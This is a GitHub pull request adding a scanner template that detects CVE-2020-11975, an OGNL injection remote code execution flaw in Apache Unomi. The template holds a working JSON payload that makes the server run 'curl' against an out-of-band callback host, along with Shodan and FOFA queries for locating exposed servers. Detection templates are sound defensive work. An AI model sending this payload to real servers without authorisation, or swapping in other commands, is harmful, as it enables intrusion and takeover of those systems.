Skip to content

Create CVE-2020-11975.yaml #12678

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 6 commits into from
Aug 22, 2025
Merged

Create CVE-2020-11975.yaml #12678

Changes from all commits
Commits
Show all changes
6 commits
Select commit Hold shift + click to select a range
8031548
Create CVE-2020-11975.yaml
Sourabh-Sahu Jul 21, 2025
25579a2
Update CVE-2020-11975.yaml
Sourabh-Sahu Jul 21, 2025
acb7b20
enhance CVE-2020-11975 template
princechaddha Jul 23, 2025
6db9e73
updated macthers
ritikchaddha Aug 17, 2025
e7ed681
update status matcher
ritikchaddha Aug 17, 2025
47d64e0
Merge branch 'main' into CVE-2020-11975
Sourabh-Sahu Aug 18, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
83 changes: 83 additions & 0 deletions http/cves/2020/CVE-2020-11975.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,83 @@
id: CVE-2020-11975

info:
name: Apache Unomi - Remote Code Execution
author: Sourabh-Sahu
severity: critical
description: |
Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, enabling attackers to execute arbitrary code.
impact: |
Successful exploitation allows an attacker to execute arbitrary code on the server with the privileges of the Java process, potentially leading to complete system compromise.
remediation: |
Update Apache Unomi to version 1.5.2 or later. Disable OGNL scripting in conditions if not required.
reference:
- https://xz.aliyun.com/news/8157
- https://github.com/1135/unomi_exploit
- https://unomi.apache.org/security/cve-2020-11975.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-11975
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11975
cwe-id: CWE-94
epss-score: 0.97373
epss-percentile: 0.99982
cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: unomi
shodan-query: http.title:"Apache Unomi"
fofa-query: title="Apache Unomi"
tags: cve,cve2020,apache,unomi,rce,ognl,oast

http:
- method: POST
path:
- "{{BaseURL}}/context.json"
headers:
Content-Type: application/json
body: |
{
"personalizations":[
{
"id":"gender-test_anystr",
"strategy":"matching-first",
"strategyOptions":{
"fallback":"var2"
},
"contents":[
{
"filters":[
{
"condition":{
"parameterValues":{
"propertyName":"(#[email protected]@getRuntime()).(#r.exec(\"curl {{interactsh-url}}\"))",
"comparisonOperator":"equals_anystr",
"propertyValue":"male_anystr"
},
"type":"profilePropertyCondition"
}
}
]
}
]
}
],
"sessionId":"test-demo-session-id"
}

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"

- type: dsl
dsl:
- 'contains_all(body, "profileId\":", "sessionId\":")'
- 'contains(content_type, "application/json")'
- 'status_code == 200 || status_code == 500'
condition: and
Loading